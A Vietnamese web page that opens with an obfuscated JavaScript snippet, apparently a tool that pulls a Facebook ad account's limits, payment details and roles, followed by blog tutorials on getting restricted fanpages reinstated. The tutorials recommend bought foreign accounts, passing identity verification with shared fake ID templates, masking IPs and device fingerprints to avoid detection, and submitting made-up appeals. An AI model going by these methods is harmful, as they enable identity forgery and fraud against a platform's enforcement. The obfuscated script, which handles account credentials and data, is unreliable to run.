\x44\x61\x74\x61%27,%27\x63\x6f\x75\x6e\x74%27,%27\x63\x61\x74\x63\x68%27,%27\x73\x73\x69\x6f\x6e%27,%27\x61\x70\x70\x6c\x79%27,%27\x5f\x5f\x74\x79\x70%27,%27\x31\x33\x31\x36\x74\x6e\x55\x46\x53\x6c%27,%27\x7c\x41\x64\x73\x43%27,%27\x69\x6e\x67%27,%27\x62\x69\x6c\x6c\x61%27,%27\x61\x74\x69\x6f\x6e%27,%27\x50\x4f\x53\x54%27,%27\x65\x65\x20\x74\x6f%27,%27\x6c\x6f\x67%27,%27\x45\x4e\x44\x49\x4e%27,%27\x36\x31\x35\x30\x30%27,%27\x67\x65\x74\x4d\x6f%27,%27\x57\x4f\x68\x6f\x49%27,%27\x6e\x74\x5f\x61\x63%27,%27\x67\x6b\x47\x71\x68%27,%27\x78\x68\x6b\x7a\x58%27,%27\x39\x34\x31\x33\x36\x32\x32\x6d\x6c\x70\x4f\x61\x62%27,%27\x6e\x75\x74\x65\x73%27,%27\x74\x6f\x5f\x5f%27,%27\x34\x38\x36\x33\x39\x33\x38\x30\x44\x6e\x6f\x68\x59\x64%27,%27\x75\x73\x61\x62\x69%27,%27\x6c\x2c\x75\x73\x65%27,%27\x28\x28\x28\x2e\x2b%27,%27\x66\x6f\x75\x72\x5f%27,%27\x67\x65\x74\x53\x65%27,%27\x57\x50\x6c\x6d\x61%27,%27\x69\x6d\x61\x72\x79%27,%27\x63\x61\x72\x64\x5f%27,%27\x41\x67\x72\x65\x65%27,%27\x74\x68\x72\x65\x73%27,%27\x61\x64\x74\x72\x75%27,%27\x42\x75\x73\x69\x6e%27,%27\x20\x54\x68\x65\u0309\x3a%27,%27\x20\x54\x68\x65\u0309\x20%27,%27\x75\x6e\x74%27,%27\x41\x64\x73\x43\x4d%27,%27\u01b0\u0303\x20\x6c\x69\u00ea\u0323%27,%27\x70\x65\x72\x6d\x69%27,%27\x65\x73\x73\x55\x6e%27,%27\x75\x72\x73%27,%27\x73\x56\x6b\x53\x66%27,%27\x43\x72\x43\x73\x67%27,%27\x6d\x65\x6e\x74%27,%27\x74\x79\x70\x65%27,%27\x2f\x61\x63\x74\x5f%27,%27\x68\u00e2\x6e\x20\x74%27,%27\x6e\x67\x5f\x70\x61%27,%27\x74\x6f\x53\x74\x72%27,%27\x6f\x6b\x2e\x63\x6f%27,%27\x6f\u1ea3\x6e\x20\x76%27,%27\x74\x69\u00ea\x75\x3a%27,%27\x63\x6f\x72\x73%27,%27\x79\x72\x6d\x62\x52%27,%27\x6e\x74\x41\x63\x63%27,%27\x6e\x74\x5f\x62\x61%27,%27\x61\x6b\x65\x2e\x43%27,%27\x70\x75\x73\x68%27,%27\x74\x61\x62\x6c\x65%27];_0x51f5=function(){return _0xaf7d1f;};return _0x51f5();}_0x35a8fb[_0x3e7274(0x30e,0x2af)+%27\x64%27]=_0x3e7274(0x30c,0x31f),_0x35a8fb[_0x3e7274(0x2fe,0x2b8)]=_0x3e7274(0x36d,0x3d9),_0x35a8fb[_0x3e7274(0x37a,0x3c0)+_0x3e7274(0x332,0x3a9)+%27\x73%27]=_0x3e7274(0x2d2,0x2eb)+%27\x64\x65%27,fetch(_0x2bd9fe+_0x3e7274(0x366,0x39a)+_0x4c341e+%27\x3f%27+_0x865a0c,_0x35a8fb)[%27\x74\x68\x65\x6e%27](_0x5e1fb6=>_0x5e1fb6[_0x3e7274(0x2c9,0x2eb)]())[_0x3e7274(0x2e3,0x285)](_0xaafc82=>{const _0x24a0be={_0xb641bd:0x218,_0x2b8de3:0x1c1,_0x48d45d:0x1fc,_0x27c1ac:0x1ec,_0x3ef607:0x1a1,_0x39d300:0x1a5,_0x18b82b:0x21f,_0xe67aa8:0x1b0,_0x99b3f5:0x14d,_0x432b80:0x1d4,_0x5de95c:0x224,_0x5bb44f:0x1e4,_0xe6e82f:0x16c,_0x312c76:0x1c6,_0x1a1704:0x18e,_0x4a67ae:0x1e7,_0x39163e:0x18b,_0x16d1f9:0x173,_0x1f2e3a:0xd7,_0x1e5478:0x14f,_0x285326:0x1ee,_0x3a6d2c:0x1e6,_0x64a2bc:0x193,_0x28fb4b:0x168,_0xe3adee:0x1ac,_0x3cbf32:0x191,_0x3b032e:0x1f1,_0x52e3fa:0x1a4,_0x485797:0x143,_0x51eb65:0x179,_0x3513da:0x1a3,_0xf0c5d1:0x1dc,_0x1890b3:0x197,_0x596dc3:0x22c,_0x4c7415:0x1e8,_0x3f737e:0x153,_0x1fea53:0x188,_0x29a7d9:0xee,_0x10447a:0x1b6,_0xa785e5:0x1ef,_0x395386:0x126,_0x9f20f3:0x263,_0x3a7137:0x228,_0x5a2381:0x23b,_0x4e81e6:0x1e5,_0x582279:0x25c,_0x3be391:0x214,_0x28b7a4:0x1ef,_0x5ef04a:0x195,_0x44602a:0x1ef,_0x5f49cb:0x1ce,_0x523005:0x1b1,_0x35c87d:0x18a,_0x58079c:0x1b6,_0x1eac87:0x1cf,_0x153c69:0x151,_0x3e8841:0x1c2,_0xed8fb:0x1bb,_0x6247c:0x182,_0x579c1b:0x235,_0x5883de:0x26f,_0x47b22b:0x22a,_0x25dbf2:0x198,_0x45402e:0x157,_0x1c0a2d:0x141,_0xc73856:0x1d2,_0xee956c:0x1ab,_0x947ee8:0x154,_0x56b517:0x188,_0x43cb70:0x1b8,_0x29e7b3:0x18f,_0x23c402:0x1e2,_0x2e46e3:0x1be,_0x834f0:0x125,_0x44b6e4:0x1c8,_0x574f3f:0x120,_0x1df07c:0x213,_0x551e78:0x1a8,_0x3cf9ef:0x159,_0x4727eb:0x1f7,_0x4717a2:0xea,_0x1cb562:0x171,_0x175118:0x1d1,_0x1ee422:0x1f1,_0xa4219d:0x17d,_0x2c07ff:0x156,_0x5ca3f3:0x1d2,_0x402a5b:0x16b,_0x267f87:0x1b8,_0x2b4ae4:0x15e,_0x3860c8:0x1d1,_0x174691:0x1ba,_0x472dfc:0x1d1,_0x705f32:0x1c0,_0x3cd336:0x22f,_0x3ffc3b:0x1e3,_0x69cb49:0x196,_0x4ea41c:0x16f,_0x16681f:0x18d,_0x921e02:0x186},_0x3d2ce6={_0x226a23:0x4e9},_0xc00699={%27\x6a\x4c\x67\x41\x63%27:function(_0x12787c,_0x4d0fad){return _0x12787c<_0x4d0fad;},%27\x73\x7a\x42\x4f\x4b%27:function(_0x2567f1,_0x40dc53){return _0x2567f1+_0x40dc53;},%27\x44\x54\x6c\x6c\x59%27:function(_0x8dd08d,_0x4cd238){return _0x8dd08d+_0x4cd238;},%27\x62\x52\x4a\x74\x57%27:_0x29d4da(-_0x24a0be._0xb641bd,-0x1e3)+%27\x49\x54%27,%27\x66\x46\x52\x75\x51%27:function(_0x393fb8,_0x47c045){return _0x393fb8==_0x47c045;},%27\x63\x41\x4a\x6a\x50%27:%27\x56\x4e\x44%27,%27\x57\x4f\x68\x6f\x49%27:function(_0x597592,_0x3826b8){return _0x597592<_0x3826b8;},%27\x56\x64\x6d\x63\x4f%27:%27\x34\x36\x31\x33\x33%27+_0x29d4da(-0x1c7,-0x227)+_0x29d4da(-0x1fc,-_0x24a0be._0x2b8de3),%27\x44\x6e\x44\x46\x53%27:_0x29d4da(-0x1af,-0x1d7)+_0x29d4da(-0x1c6,-_0x24a0be._0x48d45d)+_0x29d4da(-0x1a1,-_0x24a0be._0x27c1ac),%27\x6a\x55\x4e\x54\x68%27:_0x29d4da(-0x213,-0x219)+%27\x33\x31\x34\x31\x39%27+_0x29d4da(-_0x24a0be._0x3ef607,-_0x24a0be._0x39d300),%27\x6c\x46\x7a\x6f\x6c%27:_0x29d4da(-0x1bc,-_0x24a0be._0x18b82b)+_0x29d4da(-0x1b1,-0x1c4)+%27\x69\u00ea\x6e%27,%27\x57\x46\x63\x70\x62%27:_0x29d4da(-_0x24a0be._0xe67aa8,-0x14e)+_0x29d4da(-_0x24a0be._0x99b3f5,-0x1b5)+_0x29d4da(-0x1b5,-_0x24a0be._0x432b80),%27\x55\x49\x72\x6e\x58%27:function(_0x2a4f20,_0x535de4,_0x1ea871){return _0x2a4f20(_0x535de4,_0x1ea871);},%27\x57\x50\x6c\x6d\x61%27:_0x29d4da(-0x232,-_0x24a0be._0x5de95c)+_0x29d4da(-0x1ad,-_0x24a0be._0x5bb44f)+%27\u01b0\u0303\x20\x6c\x69\u00ea\u0323%27+%27\x75%27,%27\x44\x6f\x56\x63\x64%27:function(_0x40e1a5,_0x1d6e78){return _0x40e1a5(_0x1d6e78);},%27\x43\x72\x43\x73\x67%27:_0x29d4da(-_0x24a0be._0xe6e82f,-_0x24a0be._0x312c76)+%27\x68\u00f4\x6e\x67\x20%27+_0x29d4da(-_0x24a0be._0x1a1704,-0x1d0)+%27\x75\u00e2\u0301\x74\x20\x64%27+_0x29d4da(-_0x24a0be._0x4a67ae,-_0x24a0be._0x39163e)+%27\x75%27},{name:_0x57979f,adtrust_dsl:_0x3bc590,currency:_0x11fe18,id:_0x20367b,adspaymentcycle:_0xf5be10,users:_0x378939,user_role:_0x267d5c}=_0xaafc82;function _0x29d4da(_0x100d22,_0x5b11d9){return _0x3e7274(_0x5b11d9- -_0x3d2ce6._0x226a23,_0x100d22);}if(_0x20367b){var _0x2a474c=new Date(),_0x5486d4=_0x2a474c[_0x29d4da(-_0x24a0be._0x16d1f9,-0x146)+_0x29d4da(-_0x24a0be._0x1f2e3a,-_0x24a0be._0x1e5478)+%27\x72%27](),_0x5632eb=_0x2a474c[_0x29d4da(-_0x24a0be._0x285326,-0x201)+%27\x74\x65%27]();_0x5632eb=_0xc00699[_0x29d4da(-0x211,-_0x24a0be._0x3a6d2c)](_0x5632eb[_0x29d4da(-_0x24a0be._0x64a2bc,-0x180)+_0x29d4da(-_0x24a0be._0x28fb4b,-_0x24a0be._0xe3adee)]()[_0x29d4da(-_0x24a0be._0x3cbf32,-0x1de)+%27\x68%27],-0x245c+-0x10f1+0x354f)?_0xc00699[_0x29d4da(-0x1b6,-0x1b6)](%27\x30%27,_0x5632eb):_0x5632eb;var _0xb77a76=_0xc00699[_0x29d4da(-_0x24a0be._0x3b032e,-0x1b6)](_0x2a474c[_0x29d4da(-0x155,-_0x24a0be._0x52e3fa)+_0x29d4da(-0x12a,-_0x24a0be._0x485797)](),0x80e+-0x9a7*0x3+0x14e8);_0xb77a76=_0xc00699[_0x29d4da(-_0x24a0be._0x51eb65,-_0x24a0be._0x3a6d2c)](_0xb77a76[%27\x74\x6f\x53\x74\x72%27+_0x29d4da(-0x1b2,-0x1ac)]()[%27\x6c\x65\x6e\x67\x74%27+%27\x68%27],-0x18a9+0x18f*0x5+0x10e0)?_0xc00699[_0x29d4da(-_0x24a0be._0x3513da,-_0x24a0be._0xf0c5d1)](%27\x30%27,_0xb77a76):_0xb77a76;let _0xe425be=_0x2a474c[_0x29d4da(-0x1b1,-_0x24a0be._0x1890b3)+_0x29d4da(-_0x24a0be._0x3513da,-0x1bd)](),_0x4059e2=_0x2a474c[_0x29d4da(-_0x24a0be._0x596dc3,-_0x24a0be._0x4c7415)+_0x29d4da(-_0x24a0be._0x3f737e,-_0x24a0be._0x1fea53)](),_0x5ae1c7=_0x2a474c[_0x29d4da(-0x20f,-0x1d8)+_0x29d4da(-0x205,-0x19e)](),_0x525e1b=_0x3bc590<=0x291+0x3*-0x50b+0xc90?_0xc00699[_0x29d4da(-_0x24a0be._0x29a7d9,-0x14c)]:_0xc00699[_0x29d4da(-_0x24a0be._0x28fb4b,-_0x24a0be._0x10447a)](_0xc00699[_0x29d4da(-0x1a4,-0x1dc)](_0x3bc590,%27\x20%27),_0x11fe18),_0xcf1749=_0xf5be10?.[_0x29d4da(-0x1da,-_0x24a0be._0xa785e5)]&&_0xf5be10?.[_0x29d4da(-0x24f,-_0x24a0be._0xa785e5)][_0x29d4da(-0x17b,-0x1de)+%27\x68%27]?_0xc00699[_0x29d4da(-_0x24a0be._0x395386,-0x169)](_0x11fe18,_0xc00699[_0x29d4da(-_0x24a0be._0x9f20f3,-0x1ff)])?_0xf5be10?.[_0x29d4da(-0x1c6,-0x1ef)][-0x3d*0x98+0x4e*0x3c+0x11f0][%27\x74\x68\x72\x65\x73%27+_0x29d4da(-_0x24a0be._0x3a7137,-0x214)+_0x29d4da(-_0x24a0be._0x5a2381,-_0x24a0be._0x4e81e6)+%27\x74%27]:_0xf5be10?.[_0x29d4da(-_0x24a0be._0x582279,-0x1ef)][-0x5*-0x4d1+0x16b7+0xa*-0x4ae][_0x29d4da(-_0x24a0be._0x3f737e,-0x192)+_0x29d4da(-_0x24a0be._0x3a6d2c,-_0x24a0be._0x3be391)+%27\x61\x6d\x6f\x75\x6e%27+%27\x74%27]/(0x1*0x248d+-0x1*0xf2e+-0x83*0x29):-0x1ac0+-0x149e+0x1*0x2f5e,_0x245700=-0x18cc+0x6*0x463+-0x186;if(_0x378939&&_0x378939?.[_0x29d4da(-0x1be,-0x1ef)]?.[%27\x6c\x65\x6e\x67\x74%27+%27\x68%27])for(let _0x35f6fb=0x66c+0x1*-0x1963+0x12f7;_0xc00699[_0x29d4da(-0x1d9,-_0x24a0be._0x3513da)](_0x35f6fb,_0x378939[_0x29d4da(-0x19b,-_0x24a0be._0x28b7a4)][%27\x6c\x65\x6e\x67\x74%27+%27\x68%27]);_0x35f6fb++){const _0x48e1d3=_0x378939[_0x29d4da(-_0x24a0be._0x5ef04a,-_0x24a0be._0x44602a)][_0x35f6fb];_0x48e1d3?.[_0x29d4da(-0x132,-0x18a)+_0x29d4da(-_0x24a0be._0x5f49cb,-_0x24a0be._0x523005)+%27\x73%27]&&_0x48e1d3?.[_0x29d4da(-0x1e2,-_0x24a0be._0x35c87d)+%27\x73\x73\x69\x6f\x6e%27+%27\x73%27][_0x29d4da(-_0x24a0be._0x58079c,-0x1de)+%27\x68%27]>=0x1cdd+-0x98b+0xa*-0x1ee&&++_0x245700;}let _0x463f82=%27%27;if(_0x267d5c)switch(_0x267d5c){case _0xc00699[_0x29d4da(-0x2a6,-0x231)]:_0x463f82=_0xc00699[_0x29d4da(-0x15e,-_0x24a0be._0x1eac87)];break;case _0xc00699[_0x29d4da(-_0x24a0be._0x153c69,-0x16a)]:_0x463f82=_0xc00699[%27\x6c\x46\x7a\x6f\x6c%27];break;case _0xc00699[_0x29d4da(-_0x24a0be._0x3e8841,-0x1bc)]:_0x463f82=_0x29d4da(-_0x24a0be._0xed8fb,-0x218)+_0x29d4da(-_0x24a0be._0x1a1704,-_0x24a0be._0x6247c)+%27\x69\u0301\x63\x68%27;break;default:break;}let _0x15e23c=_0x29d4da(-_0x24a0be._0x579c1b,-0x1f2)+_0x29d4da(-_0x24a0be._0x5883de,-_0x24a0be._0x47b22b)+%27\x20%27+_0x4059e2+%27\x3a%27+_0x5ae1c7+%27\x3a%27+_0xe425be+%27\x20%27+_0x5632eb+%27\x2f%27+_0xb77a76+%27\x2f%27+_0x5486d4,_0x5501b1=_0x15e23c+%27\x0a\x49\x44\x3a\x20%27+_0x20367b[%27\x72\x65\x70\x6c\x61%27+%27\x63\x65%27](/act_/g,%27%27)+(%27\x0a\x4e\x61\x6d\x65%27+%27\x3a\x20%27)+_0x57979f+(%27\x0a\x4e\x67\u01b0\u01a1\u0303%27+%27\x6e\x67\x3a\x20%27)+_0xcf1749+%27\x20%27+_0x11fe18+(_0x29d4da(-_0x24a0be._0x3cbf32,-0x205)+_0x29d4da(-_0x24a0be._0x25dbf2,-_0x24a0be._0x99b3f5))+_0x525e1b+(_0x29d4da(-_0x24a0be._0x45402e,-0x15e)+_0x29d4da(-0x1d0,-0x1fa)+_0x29d4da(-_0x24a0be._0x1c0a2d,-0x17d)+%27\x20%27)+_0x40394c+(%27\x0a\x4c\x6f\x61\u0323\x69%27+_0x29d4da(-0x1d7,-_0x24a0be._0xc73856))+_0x463f82+(_0x29d4da(-_0x24a0be._0xee956c,-0x15e)+_0x29d4da(-0x15f,-_0x24a0be._0x947ee8)+_0x29d4da(-_0x24a0be._0x56b517,-_0x24a0be._0x43cb70))+_0x245700+(_0x29d4da(-_0x24a0be._0x29e7b3,-0x15e)+_0x29d4da(-_0x24a0be._0x23c402,-_0x24a0be._0x2e46e3)+%27\x20%27)+_0x34a3bf+(_0x29d4da(-_0x24a0be._0x834f0,-0x15e)+_0x29d4da(-0x1d4,-0x18e)+_0x29d4da(-0x15c,-_0x24a0be._0x44b6e4)+%27\x3a\x20%27)+_0x59f853+(_0x29d4da(-0x15f,-0x150)+_0x29d4da(-0x14f,-0x18f)+%27\x20%27)+_0x3ce9b2[_0x29d4da(-_0x24a0be._0x574f3f,-_0x24a0be._0x16d1f9)](%27\x2c%27)+(_0x29d4da(-0x253,-0x211)+_0x29d4da(-0x161,-0x178)+_0x29d4da(-0x1f2,-0x22f)+_0x29d4da(-_0x24a0be._0x1df07c,-_0x24a0be._0x551e78)+_0x29d4da(-0x220,-0x226)+%27\x64\x73%27),_0x375b0d=_0x15e23c+_0x29d4da(-0x14d,-_0x24a0be._0x3cf9ef)+_0x20367b[_0x29d4da(-0x1b1,-0x1bb)+%27\x63\x65%27](/act_/g,%27%27)+(%27\x7c\x4e\x61\x6d\x65%27+%27\x3a\x20%27)+_0x57979f+(_0x29d4da(-0xeb,-0x161)+_0x29d4da(-0x1c8,-0x15b))+_0xcf1749+%27\x20%27+_0x11fe18+(_0x29d4da(-0x19f,-_0x24a0be._0x4727eb)+_0x29d4da(-_0x24a0be._0x4717a2,-0x14d))+_0x525e1b+(_0x29d4da(-_0x24a0be._0x1cb562,-_0x24a0be._0x175118)+%27\x20\x63\x68\x69\x20%27+_0x29d4da(-_0x24a0be._0x1ee422,-_0x24a0be._0xa4219d)+%27\x20%27)+_0x40394c+(_0x29d4da(-0x1c4,-_0x24a0be._0x2c07ff)+_0x29d4da(-0x210,-_0x24a0be._0x5ca3f3))+_0x463f82+(_0x29d4da(-0x1c1,-0x1d1)+%27\x20\x41\x64\x6d\x69%27+_0x29d4da(-_0x24a0be._0x402a5b,-_0x24a0be._0x267f87))+_0x245700+(_0x29d4da(-_0x24a0be._0x2b4ae4,-_0x24a0be._0x3860c8)+%27\x20\x74\x68\x65\u0309\x3a%27+%27\x20%27)+_0x34a3bf+(_0x29d4da(-_0x24a0be._0x174691,-_0x24a0be._0x472dfc)+%27\x20\x54\x68\x65\u0309\x20%27+_0x29d4da(-0x23a,-0x1c8)+%27\x3a\x20%27)+_0x59f853+(_0x29d4da(-_0x24a0be._0x4727eb,-0x1ca)+_0x29d4da(-_0x24a0be._0x705f32,-_0x24a0be._0x29e7b3)+%27\x20%27)+_0x3ce9b2[%27\x6a\x6f\x69\x6e%27](%27\x2c%27)+(_0x29d4da(-0x190,-0x1ad)+_0x29d4da(-0x1c1,-0x178)+_0x29d4da(-0x1cb,-_0x24a0be._0x3cd336)+_0x29d4da(-_0x24a0be._0x3ffc3b,-_0x24a0be._0x551e78)+_0x29d4da(-0x27d,-0x226)+%27\x64\x73%27);alert(_0x5501b1),_0xc00699[%27\x55\x49\x72\x6e\x58%27](prompt,_0xc00699[_0x29d4da(-_0x24a0be._0x35c87d,-_0x24a0be._0x69cb49)],_0x375b0d);}else _0xc00699[_0x29d4da(-_0x24a0be._0x4ea41c,-0x158)](alert,_0xc00699[_0x29d4da(-_0x24a0be._0x16681f,-_0x24a0be._0x921e02)]);})[_0x3e7274(0x337,0x300)](_0x3534d1=>{const _0x50a5c0={_0x1cce7a:0x71,_0x58e406:0x29,_0x5b92d2:0x2e,_0x1a6952:0xf6,_0x1d8901:0xa7,_0x4c86d5:0x16a},_0x3f449e={%27\x52\x4e\x5a\x4d\x4a%27:function(_0x5ab99c,_0x4ae33b){return _0x5ab99c(_0x4ae33b);}};console[_0xc64050(-_0x50a5c0._0x1cce7a,0x6)](_0x3534d1);function _0xc64050(_0x37d751,_0x3d19fc){return _0x3e7274(_0x37d751- -0x3b3,_0x3d19fc);}_0x3f449e[_0xc64050(-_0x50a5c0._0x58e406,_0x50a5c0._0x5b92d2)](alert,%27\x4c\u1ed7\x69\x20\x6b%27+_0xc64050(-_0x50a5c0._0x1a6952,-0x15d)+_0xc64050(-0x89,-_0x50a5c0._0x1d8901)+_0xc64050(-0xfa,-_0x50a5c0._0x4c86d5));});} )()

 • Kinh điển: TUT kháng fanpage Facebook đã hạn chế vĩnh viễn

  Khoảng hơn 1 tuần nay Facebook bắt đầu một đợt quét Fanpage rất mạnh, nhiều Fanpage đang chạy ổn định cũng bị quét dính. Thường hành động các bạn là vội vàng dùng chính profile mình đang chạy quảng cáo để kháng Fanpage dẫn đến tỷ lệ vĩnh viễn bị cao.

  Điều này rất đáng tiếc, nếu các bạn biết cách và bình tĩnh xử lý thì việc kháng Fanpage vô cùng đơn giản, nếu không muốn nói là về 100% ( trừ mấy ông chạy hàng brand hay hàng sức khoẻ mà muốn ổn định thì chịu )

  Dù sao cũng nhỡ rồi, Fanpage nuôi bao nhiêu năm cũng không nỡ bỏ. Đi thuê dịch vụ thì giá buốt tận óc ( thường giao động 5 – 100 triệu tuỳ vào độ khủng của Fanpage ) mà cũng thấp thỏm vì chẳng ông làm dịch vụ nào dám cam kết chắc chắn. Cũng phải thôi bản thân lam dịch vụ cũng là 50 50, có phải họ quyết định đâu Bot Facebook quyết định mà ka ka.

  Hôm này chưởng môn sẽ chia sẻ cách thức giúp các bạn tự làm các bước kháng Fanpage sao cho hiệu quả, tất nhiên như mình nói ở trên tất cả cũng chỉ là tỷ lệ. Nhưng ít nhất các bạn không mất tiền oan với những case đơn giản, sản phẩm không vi phạm, Fanpage không dính pay nợ, vit voic thì cũng có tỷ lệ về khá cao.

  1/ LỰA CHỌN LOẠI VIA KHÁNG NGHỊ NÀO?

  Lựa chọn via kháng tốt nhất là via cổ US CHƯA XÁC MINH DANH TÍNH, nếu không có các bạn cũng có thể sử dụng Via ngoại khác BRAZIL, INDO chưa dính gì đến Ads hay IP việt nam lý do thì chút mình sẽ nói ở dưới.

  2/ TẠO MÔI TRƯỜNG SẠCH ĐỂ KHÁNG PAGE HẠN CHẾ VĨNH VIỄN

  Các bạn đọc bài này và làm theo hướng dẫn nhé
  https://longhn.com/ky-thuat-5-buoc-tao-moi-truong-xmdt-104-phoi-xmdt-facebook-update-moi-nhat-9898.html
  Link nhóm lấy Phôi XMDT US https://zalo.me/g/mlyrqn506

  3/ QUY TRÌNH THỰC HIỆN KHÁNG FANPAGE

  Login Via vào môi trường sạch đã tạo trên một IP cố định thì càng tốt, socks5 private được mình khuyến nghị vì nó bảo mật + tốc độ cao.

  Bạn tiến hành các bước change info, đổi pass Via trên IP này, xoá toàn bộ phiên đăng nhập ở các IP cũ của Via.

  Share Page cần kháng vào VIA nhưng chưa kháng vội, để Via đó trong khoảng 2 – 3 ngày, thi thoảng vào tạo cho cái Fanpage.

  Xoá toàn bộ quản trị page + 10 15 bài viết gần nhất ( bao gồm các bài đã chạy quảng cáo trước đó, vào ads manager để lấy link bài post nếu ko hiện trên page )

  Xác minh danh tính cho via bằng phôi US mình share ở trên
  Chụp 2 ảnh màn hình, 1 ảnh ở chất lượng trang + 1 ảnh ở chất lượng tài khoản thể hiện Fanpage bị hạn chế vĩnh viễn

  Sau đó vào link:
  https://touch.facebook.com/help/contact/164405897002583?locale2=en_GB#
  Điền link fanpage bằng ID chứ không dùng link url nhé
  UP 2 ảnh vừa chụp lên
  Phần lý do copy thần chú:

  My Fanpage has been running ads for many years now. And I pledge that I fully comply with the advertising policies from Facebook. I think this is a mistake, please support me so that I can continue to run my ads. Thanks very much

  Kháng nghị lần 1

  I'm not sure what to provide to the support team, my Fanpage has been permanently restricted from advertising for an unclear reason. I think my business is severely affected because of this problem. I hope that the support team will help me restore the right to advertise on my Fanpage.

  Kháng nghị lần 2
  =)) thôi bạn tự bịa ra đi nhé.

  Chờ mail của support

  Sau khi bạn gửi kháng nghị và có mail trả lời, bạn có thể theo dõi tiến trình xử lý kháng nghị của mình cũng như kháng nghị lại khi bị từ chối.
  https://www.facebook.com/business/help/support/get-help?selectedAsset=xxx ( thay xxx bằng ID Fanpage của bạn )

  Done tut, việc còn lại là đi ăn cơm và thắp hương chờ ngày mai. Thường các case mình thấy trả lời khá nhanh, trong khoảng 12h.

  Còn việc tại sao không dùng via VN và liên quan đến IP Việt Nam thì các case được mở và quản lý theo server của VIA. Nếu trong lúc quét ở VN mà các bạn dùng Via VN mở case thì tình trạng treo + từ chối đương nhiên là cao hơn bình thường kể cả bạn không có gì vi phạm.

  Vậy thôi, chưởng môn chúc các bạn tiết kiệm mấy chục triệu dành tiền ăn chơi cho sướng ấm vào thân các bạn nhé ka ka

 • 5 bước tạo môi trường XMDT & KHÁNG PAGE, BM + 104 phôi XMDT Facebook (update mới nhất)

  2 YẾU TỐ ẢNH HƯỞNG ĐẾN XMDT

  1/ Môi trường đang sử dụng via khi gửi xác minh danh tính:

  Mình phải nói về môi trường trước vì trong hệ thống của mình có những bạn chạy hay quên thanh toán và tài khoản bị die thường xuyên. Xmdt 20-30 lần trên vài chú via để kháng mà vẫn không trượt phát nào. Nghĩa là môi trường quyết định hầu hết trong các trường hợp xmdt, đặc biệt là via ngoại ( có cả yếu tố fake ip )

  Có hai trường phái tư duy về môi trường sạch để sử dụng các tài khoản:

  Môi trường sạch là môi trường mới hoặc môi trường login via đầu tiên.

  Thứ hai là môi trường sử dụng via… lâu dài, đang có cookie + history ổn định.

  Chưởng môn nghĩ rằng cả hai tư duy đấy đều sai ở mức độ nào đó, trừ khi bạn đủ tiền mua rất nhiều các loại phần cứng khác nhau về chỉ để sử dụng via. Đối với bot thì việc nhận diện hành vi sử dụng bất thường của một cụm tài khoản là không khó, vì hệ thống AI quản lý có lượng data hàng tỷ người dùng của FB đương nhiên rất thông minh. Việc nhận ra những thiết bị cố gắng fake info device kiểu máy ảo Vmware lại càng ngon ăn hơn, vì cả thế giới đang dùng nó

  Phương án xử lý môi trường thì mình để ở bên dưới bài anh em nhé.

  2/ Phôi XMDT

  Bạn cần chú ý 4 vấn đề sau để sử dụng phôi xmdt hiệu quả

  ⁃ Tại thời điểm bạn sử dụng có quá nhiều người đang dùng cùng phôi cùng thời điểm với bạn hay không.

  ⁃ Thông tin phôi của bạn có khớp với thông tin via + ip via của bạn đang login hay không.

  ⁃ Kích thước xuất phôi ra file jpg của bạn có đủ lớn hay không

  ⁃ Ảnh trên phôi đủ net hay không

  Để tăng tỷ lệ khi làm xmdt được tỷ lệ cao với số lượng, hãy làm beta 2 3 phôi # nhau cùng lúc, sau đó chọn phôi đang tốt làm 5 – 10 case cùng lúc.

  Link 104 phôi xác minh danh tính

  https://drive.google.com/drive/folders/1Z-7jLPu9zfHq038mF6Hm7mYzm7G7XQPU

  Link group Zalo để lấy share + hỏi đáp XMDT Facebook

  https://zalo.me/g/mlyrqn506

  KỸ THUẬT 5 BƯỚC TẠO MÔI TRƯỜNG XMDT & KHÁNG PAGE, BM by Chapallthay

  Ở đây, chưởng môn sẽ chia sẻ cho các bạn kỹ thuật @Free để các bạn có thể sử dụng một dàn Via để xmdt + kháng tài khoản quảng cáo nhé.

  Bước 1: Cài đặt LD player và trình duyệt chrome hoặc firefox trên điện thoại. ( bạn nên tạo ra 1 bản gốc, sau đó nhân ra và thay đổi info máy để sử dụng cho via riêng biệt )

  Cài đặt giả lập điện thoại: https://vn.ldplayer.net

  Bước 2: Quan trọng, chúng ta phải cài đặt FAKE IP NGOÀI MÁY TÍNH. Bật fake ip xong rồi mới bật LDPLAYER

  Fake ip: ExpressVPN nếu có điều kiện mua hoặc AvastVPN https://www.avast.com/en-eu/secureline-vpn

  Free thì có: https://protonvpn.com

  Bước 3: Sau khi Fake ip, hãy chắc rằng ip của bạn đúng ip location của via kiểm tra bằng whoer.net + ip không bị vào blacklist: https://whatismyipaddress.com/blacklist-check

  Bước 4: Login Via vào LDPLAYER trên trình duyệt chrome hoặc firefox, xoá toàn bộ phiên đăng nhập cũ. Thay đổi pass bằng link http://facebook.com/hacked

  Bước 5: TẮT ĐI, để 24h sau thì bắt đầu có thể xác minh danh tính hoặc kháng page, bm.

  Khi xmdt mà bị yêu cầu thêm xm sđt thì trước khi thêm phải thử login bằng sđt trước xem đã bị dùng trên FB trước hay không.

  Trên trình duyệt chrome của LdPlayer – Trước khi vào link xmdt hay kháng chọn chế độ ” Yêu cầu trang web dành cho máy tính để bàn”

  Kết quả

  Đây là giải pháp miễn phí nên nó cũng có hạn chế nhất định, ví dụ ip của bạn sẽ bị nhẩy ko đúng location, bị blacklist ẩn. Ngay cả những phần mềm fake ip trả phí cũng ko thể tránh được triệt để điều này, trừ khi sử dụng ip private cố định. Những hạn chế này cũng sẽ làm ảnh hưởng đến tỷ lệ kết quả xmdt của các bạn, tuy nhiên nếu bạn check cẩn thận thì sẽ không sao.

  Chú ý:

  KỸ THUẬT NÀY CŨNG GIÚP TĂNG TỶ LỆ KHÁNG PAGE, BM CÁC BẠN NHÉ.

  VIA KHÁNG KHÔNG ADD THẺ, LÊN CAMP, KHÁNG LẦN LƯỢT TỪNG CASE KHÔNG SPAM

  Chưởng môn chúc các bạn chuẩn bị một mùa bán hàng online 2022 rộn ràng và nhiều niềm vui.

 • Hướng dẫn lên camp Facebook sống xanh bền vững

  Trong bài này chưởng môn sẽ cùng các bạn phân tích đầy đủ các yếu tố ảnh hưởng đến việc lên camp của Facebook, cách bot của Facebook hoạt động.

  Và không chỉ share tut mà chưởng môn còn giúp các bạn hiểu rõ nguyên lý hoạt động của Facebook, các hướng giải quyết để về sau các bạn có thể tự tìm các giải pháp về việc lên camp xanh cho riêng mình. Nếu bạn có điều kiện có thể tham khảo thêm Khóa học Facebook chuyên sâu của Chưởng môn nhé

  Tài nguyên để lên camp Facebook tốt nhất ?

  Sử dụng loại Via nào?

